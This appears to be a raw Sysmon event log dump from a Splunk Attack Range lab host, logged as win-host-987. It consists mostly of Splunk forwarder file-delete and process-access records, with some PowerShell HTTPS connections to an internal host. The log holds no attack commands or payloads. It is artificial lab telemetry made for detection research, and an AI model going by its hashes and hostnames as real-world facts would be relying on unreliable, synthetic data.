23542300x800000000000000035127901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:03.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708BDEEE3E293BA82F6EDA70EC33846D,SHA256=6BFF31C91FD890758116B99B95819773EE38288415F1DCD558CD860A0BAD8917,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:03.265{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BFC8766665ED5E41B8D195987FE9F59A,SHA256=EDE49F26F50AC40C8367DF0086BF7E1417C21A108DB5DC99B6CA2BC42C2F8744,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:04.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B9A42A314091E9CF7A1F2E3A5BE906,SHA256=A3FEE6D786B6630CCEAC8ECFAFC143A6055AF2BF8A131BA4D9C79D0C80BA0902,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:28.416{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62084-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:05.348{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA76812FD4522F7734763ED38F54E88,SHA256=0E9E2ABBDCFC9A54A5930F1B620B37FFA7AAFE6C4E75D12047BEDC87C212579B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:06.363{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6AF308EBA5AD06EE91D82AABB82199B,SHA256=3BA17BB2F6642444C468C68B6D4FF19BDB85F62A3EBBAC1FCCAA0E967D8D180B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:30.245{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62085-false10.0.1.12-8000- 23542300x800000000000000035127907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:07.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46BF8AD5F036CD96814130761E90C190,SHA256=0E41910A0D295BB7F289AB285626640803CD959717A21544146A5960412132BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:08.416{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F666257B5FCB2AD7078E2328262758BA,SHA256=76FE877631ABE7244A1C7E6247913D8629A271B687BAA28F9D9F7F4ABDCAA036,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:08.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A8F7FDD4541C1C78C2F30D9D675D6AF4,SHA256=B5A1A8C144EA336B4531F9F2A824BA362946F2ACEE278DA7B6D0B8637535454C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:09.430{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1627DADB82286A851AB9E6E29CCF5A63,SHA256=3B846AA29639EF9B352C9B5ADA76E0C7008463DBF51A710933A4668A663EC097,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:33.428{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62086-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035127922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.561{B81B27B7-82FA-613A-C096-03000000C801}10006488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D333855FFCA1D38AA541CF7762CC7E4,SHA256=61078FC0C1BC35F4B9129992160F12BDF7ED2C76E2DF49B468211A83C3272F52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.396{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82FA-613A-C096-03000000C801}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.394{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.394{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.394{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.393{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.393{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-82FA-613A-C096-03000000C801}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.393{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82FA-613A-C096-03000000C801}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:10.377{B81B27B7-82FA-613A-C096-03000000C801}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:35.295{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62087-false10.0.1.12-8000- 23542300x800000000000000035127933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D56F3EBFEBF3673A823D692DDCACA088,SHA256=54A9CAAEE06787CDC2C2AEFDB930E7CB1E252953848A1E2B7A4C4E37977DA409,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70D5E5E45AE7CF181062C5AD671BB462,SHA256=B18A672631F928AC4CA5342B376C75609698F0F056F3E7A16A51DC932DABA5F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB9825BE106FE103DDE32FB91CD53655,SHA256=65644D3A6B04E2F8306297E8D42607FD2DC840AF790506A92DDBC8A3A7AA726F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.097{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82FB-613A-C196-03000000C801}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.095{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.094{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.094{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82FB-613A-C196-03000000C801}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.093{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82FB-613A-C196-03000000C801}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:11.077{B81B27B7-82FB-613A-C196-03000000C801}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:12.628{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD2265DE15DB10BF318A52CC7399CF7B,SHA256=67AC34ED56D4FFBC8E0ACF063F4B58B2FDBF98D4F1FC345F9B009FAC6ECF92DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:13.642{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=758FB810C4904BF9E74AF588516CE058,SHA256=17DFA6FCD1671871453984C8E6769CEB69CABDC72F1AC9CA2BC1AB7483CA6F44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:13.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A7EB5AD97CE4215B99BA8F60B0346E4,SHA256=4996D4D9B4E94C99DF04E72E40BA183341A76210077F94BEF527D8D9C3E10AA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:14.642{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C69562B4FDEA7580141FEB18127A9F9,SHA256=4475E5133929DC6B4EB3DC7709CF2F443CE19125816F09FC9D113F6E1DD70699,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 